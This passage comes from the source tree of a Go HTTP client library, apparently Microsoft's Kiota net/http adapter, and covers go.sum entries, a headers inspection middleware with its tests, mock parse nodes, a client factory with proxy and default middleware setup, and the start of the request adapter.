h1:6pFjapn8bFcIbiKo3XT4j/BhANplGihG6tvd+8rYgrY= 5 | github.com/go-logr/logr v1.4.2/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= 6 | github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= 7 | github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= 8 | github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= 9 | github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= 10 | github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= 11 | github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 12 | github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= 13 | github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk= 14 | github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= 15 | 
github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= 16 | github.com/microsoft/kiota-abstractions-go v1.9.2 h1:3U5VgN2YGe3lsu1pyuS0t5jxv1llxX2ophwX8ewE6wQ= 17 | github.com/microsoft/kiota-abstractions-go v1.9.2/go.mod h1:f06pl3qSyvUHEfVNkiRpXPkafx7khZqQEb71hN/pmuU= 18 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 19 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 20 | github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= 21 | github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= 22 | github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3 h1:7hth9376EoQEd1hH4lAp3vnaLP2UMyxuMMghLKzDHyU= 23 | github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3/go.mod h1:Z5KcoM0YLC7INlNhEezeIZ0TZNYf7WSNO0Lvah4DSeQ= 24 | github.com/stretchr/testify v1.10.0 h1:Xv5erBjTwe/5IxqUQTdXv5kgmIvbHo3QQyRwhJsOfJA= 25 | github.com/stretchr/testify v1.10.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= 26 | go.opentelemetry.io/auto/sdk v1.1.0 h1:cH53jehLUN6UFLY71z+NDOiNJqDdPRaXzTel0sJySYA= 27 | go.opentelemetry.io/auto/sdk v1.1.0/go.mod h1:3wSPjt5PWp2RhlCcmmOial7AvC4DQqZb7a7wCow3W8A= 28 | go.opentelemetry.io/otel v1.35.0 h1:xKWKPxrxB6OtMCbmMY021CqC45J+3Onta9MqjhnusiQ= 29 | go.opentelemetry.io/otel v1.35.0/go.mod h1:UEqy8Zp11hpkUrL73gSlELM0DupHoiq72dR+Zqel/+Y= 30 | go.opentelemetry.io/otel/metric v1.35.0 h1:0znxYu2SNyuMSQT4Y9WDWej0VpcsxkuklLa4/siN90M= 31 | go.opentelemetry.io/otel/metric v1.35.0/go.mod h1:nKVFgxBZ2fReX6IlyW28MgZojkoAkJGaE8CpgeAU3oE= 32 | go.opentelemetry.io/otel/trace v1.35.0 h1:dPpEfJu1sDIqruz7BHFG3c7528f6ddfSWfFDVt/xgMs= 33 | go.opentelemetry.io/otel/trace v1.35.0/go.mod h1:WUk7DtFp1Aw2MkvqGdwiXYDZZNvA/1J8o6xRXLrIkyc= 34 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 35 | gopkg.in/check.v1 
v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= 36 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= 37 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 38 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 39 | -------------------------------------------------------------------------------- /headers_inspection_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | abstractions "github.com/microsoft/kiota-abstractions-go" 7 | "go.opentelemetry.io/otel" 8 | "go.opentelemetry.io/otel/attribute" 9 | "go.opentelemetry.io/otel/trace" 10 | ) 11 | 12 | // HeadersInspectionHandlerOptions is the options to use when inspecting headers 13 | type HeadersInspectionOptions struct { 14 | InspectRequestHeaders bool 15 | InspectResponseHeaders bool 16 | RequestHeaders *abstractions.RequestHeaders 17 | ResponseHeaders *abstractions.ResponseHeaders 18 | } 19 | 20 | // NewHeadersInspectionOptions creates a new HeadersInspectionOptions with default options 21 | func NewHeadersInspectionOptions() *HeadersInspectionOptions { 22 | return &HeadersInspectionOptions{ 23 | RequestHeaders: abstractions.NewRequestHeaders(), 24 | ResponseHeaders: abstractions.NewResponseHeaders(), 25 | } 26 | } 27 | 28 | type headersInspectionOptionsInt interface { 29 | abstractions.RequestOption 30 | GetInspectRequestHeaders() bool 31 | GetInspectResponseHeaders() bool 32 | GetRequestHeaders() *abstractions.RequestHeaders 33 | GetResponseHeaders() *abstractions.ResponseHeaders 34 | } 35 | 36 | var headersInspectionKeyValue = abstractions.RequestOptionKey{ 37 | Key: "nethttplibrary.HeadersInspectionOptions", 38 | } 39 | 40 | // GetInspectRequestHeaders returns true if the request headers should be inspected 41 | func (o *HeadersInspectionOptions) 
GetInspectRequestHeaders() bool { 42 | return o.InspectRequestHeaders 43 | } 44 | 45 | // GetInspectResponseHeaders returns true if the response headers should be inspected 46 | func (o *HeadersInspectionOptions) GetInspectResponseHeaders() bool { 47 | return o.InspectResponseHeaders 48 | } 49 | 50 | // GetRequestHeaders returns the request headers 51 | func (o *HeadersInspectionOptions) GetRequestHeaders() *abstractions.RequestHeaders { 52 | return o.RequestHeaders 53 | } 54 | 55 | // GetResponseHeaders returns the response headers 56 | func (o *HeadersInspectionOptions) GetResponseHeaders() *abstractions.ResponseHeaders { 57 | return o.ResponseHeaders 58 | } 59 | 60 | // GetKey returns the key for the HeadersInspectionOptions 61 | func (o *HeadersInspectionOptions) GetKey() abstractions.RequestOptionKey { 62 | return headersInspectionKeyValue 63 | } 64 | 65 | // HeadersInspectionHandler allows inspecting of the headers of the request and response via a request option 66 | type HeadersInspectionHandler struct { 67 | options HeadersInspectionOptions 68 | } 69 | 70 | // NewHeadersInspectionHandler creates a new HeadersInspectionHandler with default options 71 | func NewHeadersInspectionHandler() *HeadersInspectionHandler { 72 | return NewHeadersInspectionHandlerWithOptions(*NewHeadersInspectionOptions()) 73 | } 74 | 75 | // NewHeadersInspectionHandlerWithOptions creates a new HeadersInspectionHandler with the given options 76 | func NewHeadersInspectionHandlerWithOptions(options HeadersInspectionOptions) *HeadersInspectionHandler { 77 | return &HeadersInspectionHandler{options: options} 78 | } 79 | 80 | // Intercept implements the interface and evaluates whether to retry a failed request. 
81 | func (middleware HeadersInspectionHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 82 | obsOptions := GetObservabilityOptionsFromRequest(req) 83 | ctx := req.Context() 84 | var span trace.Span 85 | var observabilityName string 86 | if obsOptions != nil { 87 | observabilityName = obsOptions.GetTracerInstrumentationName() 88 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "HeadersInspectionHandler_Intercept") 89 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.headersInspection.enable", true)) 90 | defer span.End() 91 | req = req.WithContext(ctx) 92 | } 93 | reqOption, ok := req.Context().Value(headersInspectionKeyValue).(headersInspectionOptionsInt) 94 | if !ok { 95 | reqOption = &middleware.options 96 | } 97 | if reqOption.GetInspectRequestHeaders() { 98 | for k, v := range req.Header { 99 | if len(v) == 1 { 100 | reqOption.GetRequestHeaders().Add(k, v[0]) 101 | } else { 102 | reqOption.GetRequestHeaders().Add(k, v[0], v[1:]...) 103 | } 104 | } 105 | } 106 | response, err := pipeline.Next(req, middlewareIndex) 107 | if err != nil { 108 | return response, err 109 | } 110 | if reqOption.GetInspectResponseHeaders() { 111 | for k, v := range response.Header { 112 | if len(v) == 1 { 113 | reqOption.GetResponseHeaders().Add(k, v[0]) 114 | } else { 115 | reqOption.GetResponseHeaders().Add(k, v[0], v[1:]...) 
116 | } 117 | } 118 | } 119 | return response, err 120 | } 121 | -------------------------------------------------------------------------------- /headers_inspection_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | "net/http/httptest" 6 | "testing" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | assert "github.com/stretchr/testify/assert" 10 | ) 11 | 12 | func TestItCreateANewHeadersInspectionHandler(t *testing.T) { 13 | handler := NewHeadersInspectionHandler() 14 | assert.NotNil(t, handler) 15 | _, ok := any(handler).(Middleware) 16 | assert.True(t, ok, "handler does not implement Middleware") 17 | } 18 | func TestHeadersInspectionOptionsImplementTheOptionInterface(t *testing.T) { 19 | options := NewHeadersInspectionOptions() 20 | assert.NotNil(t, options) 21 | _, ok := any(options).(abs.RequestOption) 22 | assert.True(t, ok, "options does not implement optionsType") 23 | } 24 | 25 | func TestItGetsRequestHeaders(t *testing.T) { 26 | options := NewHeadersInspectionOptions() 27 | options.InspectRequestHeaders = true 28 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 29 | handler := NewHeadersInspectionHandlerWithOptions(*options) 30 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 31 | res.Header().Add("test", "test") 32 | res.WriteHeader(200) 33 | res.Write([]byte("body")) 34 | })) 35 | defer func() { testServer.Close() }() 36 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 37 | req.Header.Add("test", "test") 38 | if err != nil { 39 | t.Error(err) 40 | } 41 | _, err = handler.Intercept(newNoopPipeline(), 0, req) 42 | if err != nil { 43 | t.Error(err) 44 | } 45 | 46 | assert.NotEmpty(t, options.GetRequestHeaders().ListKeys()) 47 | assert.Equal(t, "test", options.GetRequestHeaders().Get("test")[0]) 48 | assert.Empty(t, 
options.GetResponseHeaders().ListKeys()) 49 | } 50 | 51 | func TestItGetsResponseHeaders(t *testing.T) { 52 | options := NewHeadersInspectionOptions() 53 | options.InspectResponseHeaders = true 54 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 55 | handler := NewHeadersInspectionHandlerWithOptions(*options) 56 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 57 | res.Header().Add("test", "test") 58 | res.WriteHeader(200) 59 | res.Write([]byte("body")) 60 | })) 61 | defer func() { testServer.Close() }() 62 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 63 | req.Header.Add("test", "test") 64 | if err != nil { 65 | t.Error(err) 66 | } 67 | _, err = handler.Intercept(newNoopPipeline(), 0, req) 68 | if err != nil { 69 | t.Error(err) 70 | } 71 | 72 | assert.NotEmpty(t, options.GetResponseHeaders().ListKeys()) 73 | assert.Equal(t, "test", options.GetResponseHeaders().Get("test")[0]) 74 | assert.Empty(t, options.GetRequestHeaders().ListKeys()) 75 | } 76 | -------------------------------------------------------------------------------- /internal/mock_entity.go: -------------------------------------------------------------------------------- 1 | package internal 2 | 3 | import ( 4 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 5 | ) 6 | 7 | type MockEntity struct { 8 | } 9 | 10 | type MockEntityAble interface { 11 | absser.Parsable 12 | } 13 | 14 | func (e *MockEntity) Serialize(writer absser.SerializationWriter) error { 15 | return nil 16 | } 17 | func (e *MockEntity) GetFieldDeserializers() map[string]func(absser.ParseNode) error { 18 | return make(map[string]func(absser.ParseNode) error) 19 | } 20 | func MockEntityFactory(parseNode absser.ParseNode) (absser.Parsable, error) { 21 | return &MockEntity{}, nil 22 | } 23 | -------------------------------------------------------------------------------- /internal/mock_parse_node_factory.go: 
-------------------------------------------------------------------------------- 1 | package internal 2 | 3 | import ( 4 | "time" 5 | 6 | "github.com/google/uuid" 7 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 8 | ) 9 | 10 | type MockParseNodeFactory struct { 11 | } 12 | 13 | func (e *MockParseNodeFactory) GetValidContentType() (string, error) { 14 | return "application/json", nil 15 | } 16 | func (e *MockParseNodeFactory) GetRootParseNode(contentType string, content []byte) (absser.ParseNode, error) { 17 | return &MockParseNode{}, nil 18 | } 19 | 20 | type MockParseNode struct { 21 | } 22 | 23 | func (e *MockParseNode) GetOnBeforeAssignFieldValues() absser.ParsableAction { 24 | //TODO implement me 25 | panic("implement me") 26 | } 27 | 28 | func (e *MockParseNode) SetOnBeforeAssignFieldValues(action absser.ParsableAction) error { 29 | //TODO implement me 30 | panic("implement me") 31 | } 32 | 33 | func (e *MockParseNode) GetOnAfterAssignFieldValues() absser.ParsableAction { 34 | //TODO implement me 35 | panic("implement me") 36 | } 37 | 38 | func (e *MockParseNode) SetOnAfterAssignFieldValues(action absser.ParsableAction) error { 39 | //TODO implement me 40 | panic("implement me") 41 | } 42 | 43 | func (*MockParseNode) GetRawValue() (interface{}, error) { 44 | return nil, nil 45 | } 46 | 47 | func (e *MockParseNode) GetChildNode(index string) (absser.ParseNode, error) { 48 | return nil, nil 49 | } 50 | func (e *MockParseNode) GetCollectionOfObjectValues(ctor absser.ParsableFactory) ([]absser.Parsable, error) { 51 | return nil, nil 52 | } 53 | func (e *MockParseNode) GetCollectionOfPrimitiveValues(targetType string) ([]interface{}, error) { 54 | return nil, nil 55 | } 56 | func (e *MockParseNode) GetCollectionOfEnumValues(parser absser.EnumFactory) ([]interface{}, error) { 57 | return nil, nil 58 | } 59 | func (e *MockParseNode) GetObjectValue(ctor absser.ParsableFactory) (absser.Parsable, error) { 60 | if ctor != nil { 61 | _, err := ctor(e) 
62 | if err != nil { 63 | return nil, err 64 | } 65 | } 66 | return &MockEntity{}, nil 67 | } 68 | func (e *MockParseNode) GetStringValue() (*string, error) { 69 | return nil, nil 70 | } 71 | func (e *MockParseNode) GetBoolValue() (*bool, error) { 72 | return nil, nil 73 | 74 | } 75 | func (e *MockParseNode) GetInt8Value() (*int8, error) { 76 | return nil, nil 77 | 78 | } 79 | func (e *MockParseNode) GetByteValue() (*byte, error) { 80 | return nil, nil 81 | 82 | } 83 | func (e *MockParseNode) GetFloat32Value() (*float32, error) { 84 | return nil, nil 85 | 86 | } 87 | func (e *MockParseNode) GetFloat64Value() (*float64, error) { 88 | return nil, nil 89 | 90 | } 91 | func (e *MockParseNode) GetInt32Value() (*int32, error) { 92 | return nil, nil 93 | 94 | } 95 | func (e *MockParseNode) GetInt64Value() (*int64, error) { 96 | return nil, nil 97 | 98 | } 99 | func (e *MockParseNode) GetTimeValue() (*time.Time, error) { 100 | return nil, nil 101 | 102 | } 103 | func (e *MockParseNode) GetISODurationValue() (*absser.ISODuration, error) { 104 | return nil, nil 105 | 106 | } 107 | func (e *MockParseNode) GetTimeOnlyValue() (*absser.TimeOnly, error) { 108 | return nil, nil 109 | 110 | } 111 | func (e *MockParseNode) GetDateOnlyValue() (*absser.DateOnly, error) { 112 | return nil, nil 113 | 114 | } 115 | func (e *MockParseNode) GetUUIDValue() (*uuid.UUID, error) { 116 | return nil, nil 117 | 118 | } 119 | func (e *MockParseNode) GetEnumValue(parser absser.EnumFactory) (interface{}, error) { 120 | return nil, nil 121 | 122 | } 123 | func (e *MockParseNode) GetByteArrayValue() ([]byte, error) { 124 | return nil, nil 125 | 126 | } 127 | -------------------------------------------------------------------------------- /kiota_client_factory.go: -------------------------------------------------------------------------------- 1 | // Package nethttplibrary implements the Kiota abstractions with net/http to execute the requests. 
2 | // It also provides a middleware infrastructure with some default middleware handlers like the retry handler and the redirect handler. 3 | package nethttplibrary 4 | 5 | import ( 6 | "errors" 7 | abs "github.com/microsoft/kiota-abstractions-go" 8 | nethttp "net/http" 9 | "net/url" 10 | "time" 11 | ) 12 | 13 | // GetClientWithProxySettings creates a new default net/http client with a proxy url and default middleware 14 | // Not providing any middleware would result in having default middleware provided 15 | func GetClientWithProxySettings(proxyUrlStr string, middleware ...Middleware) (*nethttp.Client, error) { 16 | client := getDefaultClientWithoutMiddleware() 17 | 18 | transport, err := getTransportWithProxy(proxyUrlStr, nil, middleware...) 19 | if err != nil { 20 | return nil, err 21 | } 22 | client.Transport = transport 23 | return client, nil 24 | } 25 | 26 | // GetClientWithAuthenticatedProxySettings creates a new default net/http client with a proxy url and default middleware 27 | // Not providing any middleware would result in having default middleware provided 28 | func GetClientWithAuthenticatedProxySettings(proxyUrlStr string, username string, password string, middleware ...Middleware) (*nethttp.Client, error) { 29 | client := getDefaultClientWithoutMiddleware() 30 | 31 | user := url.UserPassword(username, password) 32 | transport, err := getTransportWithProxy(proxyUrlStr, user, middleware...) 
33 | if err != nil { 34 | return nil, err 35 | } 36 | client.Transport = transport 37 | return client, nil 38 | } 39 | 40 | func getTransportWithProxy(proxyUrlStr string, user *url.Userinfo, middlewares ...Middleware) (nethttp.RoundTripper, error) { 41 | proxyURL, err := url.Parse(proxyUrlStr) 42 | if err != nil { 43 | return nil, err 44 | } 45 | 46 | if user != nil { 47 | proxyURL.User = user 48 | } 49 | 50 | transport := &nethttp.Transport{ 51 | Proxy: nethttp.ProxyURL(proxyURL), 52 | } 53 | 54 | if len(middlewares) == 0 { 55 | middlewares = GetDefaultMiddlewares() 56 | } 57 | 58 | return NewCustomTransportWithParentTransport(transport, middlewares...), nil 59 | } 60 | 61 | // GetDefaultClient creates a new default net/http client with the options configured for the Kiota request adapter 62 | func GetDefaultClient(middleware ...Middleware) *nethttp.Client { 63 | client := getDefaultClientWithoutMiddleware() 64 | client.Transport = NewCustomTransport(middleware...) 65 | return client 66 | } 67 | 68 | // used for internal unit testing 69 | func getDefaultClientWithoutMiddleware() *nethttp.Client { 70 | // the default client doesn't come with any other settings than making a new one does, and using the default client impacts behavior for non-kiota requests 71 | return &nethttp.Client{ 72 | CheckRedirect: func(req *nethttp.Request, via []*nethttp.Request) error { 73 | return nethttp.ErrUseLastResponse 74 | }, 75 | Timeout: time.Second * 100, 76 | } 77 | } 78 | 79 | // GetDefaultMiddlewares creates a new default set of middlewares for the Kiota request adapter 80 | func GetDefaultMiddlewares() []Middleware { 81 | return getDefaultMiddleWare(make(map[abs.RequestOptionKey]Middleware)) 82 | } 83 | 84 | // GetDefaultMiddlewaresWithOptions creates a new default set of middlewares for the Kiota request adapter with options 85 | func GetDefaultMiddlewaresWithOptions(requestOptions ...abs.RequestOption) ([]Middleware, error) { 86 | if len(requestOptions) == 0 { 87 | return 
GetDefaultMiddlewares(), nil 88 | } 89 | 90 | // map of middleware options 91 | middlewareMap := make(map[abs.RequestOptionKey]Middleware) 92 | 93 | for _, element := range requestOptions { 94 | switch v := element.(type) { 95 | case *RetryHandlerOptions: 96 | middlewareMap[retryKeyValue] = NewRetryHandlerWithOptions(*v) 97 | case *RedirectHandlerOptions: 98 | middlewareMap[redirectKeyValue] = NewRedirectHandlerWithOptions(*v) 99 | case *CompressionOptions: 100 | middlewareMap[compressKey] = NewCompressionHandlerWithOptions(*v) 101 | case CompressionOptions: 102 | println("deprecation notice: function GetDefaultMiddlewaresWithOptions expects a pointer to CompressionOptions. Use the NewCompressionOptionsReference convenience function.") 103 | middlewareMap[compressKey] = NewCompressionHandlerWithOptions(v) 104 | case *ParametersNameDecodingOptions: 105 | middlewareMap[parametersNameDecodingKeyValue] = NewParametersNameDecodingHandlerWithOptions(*v) 106 | case *UserAgentHandlerOptions: 107 | middlewareMap[userAgentKeyValue] = NewUserAgentHandlerWithOptions(v) 108 | case *HeadersInspectionOptions: 109 | middlewareMap[headersInspectionKeyValue] = NewHeadersInspectionHandlerWithOptions(*v) 110 | default: 111 | // none of the above types 112 | return nil, errors.New("unsupported option type") 113 | } 114 | } 115 | 116 | middleware := getDefaultMiddleWare(middlewareMap) 117 | return middleware, nil 118 | } 119 | 120 | // getDefaultMiddleWare creates a new default set of middlewares for the Kiota request adapter 121 | func getDefaultMiddleWare(middlewareMap map[abs.RequestOptionKey]Middleware) []Middleware { 122 | middlewareSource := map[abs.RequestOptionKey]func() Middleware{ 123 | retryKeyValue: func() Middleware { 124 | return NewRetryHandler() 125 | }, 126 | redirectKeyValue: func() Middleware { 127 | return NewRedirectHandler() 128 | }, 129 | compressKey: func() Middleware { 130 | return NewCompressionHandler() 131 | }, 132 | parametersNameDecodingKeyValue: func() 
Middleware { 133 | return NewParametersNameDecodingHandler() 134 | }, 135 | userAgentKeyValue: func() Middleware { 136 | return NewUserAgentHandler() 137 | }, 138 | headersInspectionKeyValue: func() Middleware { 139 | return NewHeadersInspectionHandler() 140 | }, 141 | } 142 | 143 | // loop over middlewareSource and add any middleware that wasn't provided in the requestOptions 144 | for key, value := range middlewareSource { 145 | if _, ok := middlewareMap[key]; !ok { 146 | middlewareMap[key] = value() 147 | } 148 | } 149 | 150 | var middleware []Middleware 151 | for _, value := range middlewareMap { 152 | middleware = append(middleware, value) 153 | } 154 | 155 | return middleware 156 | } 157 | -------------------------------------------------------------------------------- /kiota_client_factory_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | abstractions "github.com/microsoft/kiota-abstractions-go" 5 | "github.com/stretchr/testify/assert" 6 | nethttp "net/http" 7 | "testing" 8 | "time" 9 | ) 10 | 11 | func TestGetDefaultMiddleWareWithMultipleOptions(t *testing.T) { 12 | retryOptions := RetryHandlerOptions{ 13 | ShouldRetry: func(delay time.Duration, executionCount int, request *nethttp.Request, response *nethttp.Response) bool { 14 | return false 15 | }, 16 | } 17 | redirectHandlerOptions := RedirectHandlerOptions{ 18 | MaxRedirects: defaultMaxRedirects, 19 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 20 | return true 21 | }, 22 | } 23 | compressionOptions := NewCompressionOptionsReference(false) 24 | parametersNameDecodingOptions := ParametersNameDecodingOptions{ 25 | Enable: true, 26 | ParametersToDecode: []byte{'-', '.', '~', '$'}, 27 | } 28 | userAgentHandlerOptions := UserAgentHandlerOptions{ 29 | Enabled: true, 30 | ProductName: "kiota-go", 31 | ProductVersion: "1.1.0", 32 | } 33 | headersInspectionOptions := HeadersInspectionOptions{ 34 | 
RequestHeaders: abstractions.NewRequestHeaders(), 35 | ResponseHeaders: abstractions.NewResponseHeaders(), 36 | } 37 | options, err := GetDefaultMiddlewaresWithOptions(&retryOptions, 38 | &redirectHandlerOptions, 39 | compressionOptions, 40 | ¶metersNameDecodingOptions, 41 | &userAgentHandlerOptions, 42 | &headersInspectionOptions, 43 | ) 44 | if err != nil { 45 | t.Errorf(err.Error()) 46 | } 47 | if len(options) != 6 { 48 | t.Errorf("expected 6 middleware, got %v", len(options)) 49 | } 50 | 51 | for _, element := range options { 52 | switch v := element.(type) { 53 | case *CompressionHandler: 54 | assert.Equal(t, v.options.ShouldCompress(), compressionOptions.ShouldCompress()) 55 | } 56 | } 57 | } 58 | 59 | func TestGetDefaultMiddleWareWithInvalidOption(t *testing.T) { 60 | chaosOptions := ChaosHandlerOptions{ 61 | ChaosPercentage: 101, 62 | ChaosStrategy: Random, 63 | } 64 | _, err := GetDefaultMiddlewaresWithOptions(&chaosOptions) 65 | 66 | assert.Equal(t, err.Error(), "unsupported option type") 67 | } 68 | 69 | func TestGetDefaultMiddleWareWithOptions(t *testing.T) { 70 | compression := NewCompressionOptionsReference(false) 71 | options, err := GetDefaultMiddlewaresWithOptions(compression) 72 | verifyMiddlewareWithDisabledCompression(t, options, err) 73 | } 74 | 75 | func TestGetDefaultMiddleWareWithOptionsDeprecated(t *testing.T) { 76 | compression := NewCompressionOptions(false) 77 | options, err := GetDefaultMiddlewaresWithOptions(compression) 78 | verifyMiddlewareWithDisabledCompression(t, options, err) 79 | } 80 | 81 | func verifyMiddlewareWithDisabledCompression(t *testing.T, options []Middleware, err error) { 82 | if err != nil { 83 | t.Errorf(err.Error()) 84 | } 85 | if len(options) != 6 { 86 | t.Errorf("expected 6 middleware, got %v", len(options)) 87 | } 88 | for _, element := range options { 89 | switch v := element.(type) { 90 | case *CompressionHandler: 91 | assert.Equal(t, v.options.ShouldCompress(), false) 92 | } 93 | } 94 | } 95 | 96 | func 
TestGetDefaultMiddlewares(t *testing.T) { 97 | options := GetDefaultMiddlewares() 98 | if len(options) != 6 { 99 | t.Errorf("expected 6 middleware, got %v", len(options)) 100 | } 101 | 102 | for _, element := range options { 103 | switch v := element.(type) { 104 | case *CompressionHandler: 105 | assert.True(t, v.options.ShouldCompress()) 106 | } 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /middleware.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import nethttp "net/http" 4 | 5 | // Middleware interface for cross cutting concerns with HTTP requests and responses. 6 | type Middleware interface { 7 | // Intercept intercepts the request and returns the response. The implementer MUST call pipeline.Next() 8 | Intercept(Pipeline, int, *nethttp.Request) (*nethttp.Response, error) 9 | } 10 | -------------------------------------------------------------------------------- /nethttp_request_adapter.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "errors" 7 | "io" 8 | nethttp "net/http" 9 | "reflect" 10 | "regexp" 11 | "strconv" 12 | "strings" 13 | 14 | abs "github.com/microsoft/kiota-abstractions-go" 15 | absauth "github.com/microsoft/kiota-abstractions-go/authentication" 16 | absser "github.com/microsoft/kiota-abstractions-go/serialization" 17 | "github.com/microsoft/kiota-abstractions-go/store" 18 | "go.opentelemetry.io/otel" 19 | "go.opentelemetry.io/otel/attribute" 20 | "go.opentelemetry.io/otel/codes" 21 | "go.opentelemetry.io/otel/trace" 22 | ) 23 | 24 | // nopCloser is an alternate io.nopCloser implementation which 25 | // provides io.ReadSeekCloser instead of io.ReadCloser as we need 26 | // Seek for retries 27 | type nopCloser struct { 28 | io.ReadSeeker 29 | } 30 | 31 | func NopCloser(r io.ReadSeeker) io.ReadSeekCloser { 32 | 
return nopCloser{r} 33 | } 34 | 35 | func (nopCloser) Close() error { return nil } 36 | 37 | // NetHttpRequestAdapter implements the RequestAdapter interface using net/http 38 | type NetHttpRequestAdapter struct { 39 | // serializationWriterFactory is the factory used to create serialization writers 40 | serializationWriterFactory absser.SerializationWriterFactory 41 | // parseNodeFactory is the factory used to create parse nodes 42 | parseNodeFactory absser.ParseNodeFactory 43 | // httpClient is the client used to send requests 44 | httpClient *nethttp.Client 45 | // authenticationProvider is the provider used to authenticate requests 46 | authenticationProvider absauth.AuthenticationProvider 47 | // The base url for every request. 48 | baseUrl string 49 | // The observation options for the request adapter. 50 | observabilityOptions ObservabilityOptions 51 | } 52 | 53 | // NewNetHttpRequestAdapter creates a new NetHttpRequestAdapter with the given parameters 54 | func NewNetHttpRequestAdapter(authenticationProvider absauth.AuthenticationProvider) (*NetHttpRequestAdapter, error) { 55 | return NewNetHttpRequestAdapterWithParseNodeFactory(authenticationProvider, nil) 56 | } 57 | 58 | // NewNetHttpRequestAdapterWithParseNodeFactory creates a new NetHttpRequestAdapter with the given parameters 59 | func NewNetHttpRequestAdapterWithParseNodeFactory(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory) (*NetHttpRequestAdapter, error) { 60 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory(authenticationProvider, parseNodeFactory, nil) 61 | } 62 | 63 | // NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory creates a new NetHttpRequestAdapter with the given parameters 64 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactory(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory 
absser.SerializationWriterFactory) (*NetHttpRequestAdapter, error) { 65 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient(authenticationProvider, parseNodeFactory, serializationWriterFactory, nil) 66 | } 67 | 68 | // NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient creates a new NetHttpRequestAdapter with the given parameters 69 | func NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClient(authenticationProvider absauth.AuthenticationProvider, parseNodeFactory absser.ParseNodeFactory, serializationWriterFactory absser.SerializationWriterFactory, httpClient *nethttp.Client) (*NetHttpRequestAdapter, error) { 70 | return NewNetHttpRequestAdapterWithParseNodeFactoryAndSerializationWriterFactoryAndHttpClientAndObservabilityOptions(authenticationProvider, parseNodeFactory, serializationWriterFactory, httpClient, ObservabilityOptions{}) 71 | } 72 | 73 | // 